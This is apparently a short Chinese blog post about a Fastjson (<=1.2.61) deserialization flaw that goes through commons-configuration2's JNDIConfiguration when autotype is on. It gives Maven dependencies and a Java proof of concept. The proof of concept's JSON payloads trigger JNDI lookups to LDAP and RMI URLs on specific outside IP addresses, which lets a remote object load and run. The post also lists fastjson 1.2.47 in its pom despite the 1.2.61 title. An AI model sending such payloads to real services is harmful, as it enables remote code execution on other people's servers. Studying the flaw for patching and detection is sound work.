Fastjson1.2.61鸡肋的反序列化

漏洞预警

https://help.aliyun.com/noticelist/articleid/1060056174.html

https://github.com/jas502n/fastjson-1.2.61-RCE/

要求

* Fastjson <= 1.2.61
* commons-configuration2  2.0
* 手工开启autotype--ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

commons-configuration2不是原生的包，需要手工引入，并且漏洞需要手工开启autotype




Pom:

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.47</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.commons/commons-configuration2 -->
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-configuration2</artifactId>
    <version>2.0</version>
</dependency>

1578298668118

测试代码：

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

public class fjtest {
    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        String jsonStr1 = "{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"ldap://10.10.20.166:1389/ExportObject\"}";
        String jsonStr2 = "{\n" +
                "  \"@type\": \"org.apache.commons.configuration2.JNDIConfiguration\",\n" +
                "  \"prefix\": \"rmi://120.79.91.29:9999/ExportObject\"\n" +
                "}";
        JSONObject json = JSON.parseObject(jsonStr2);
        json.toJSONString();
    }
}

1578298645913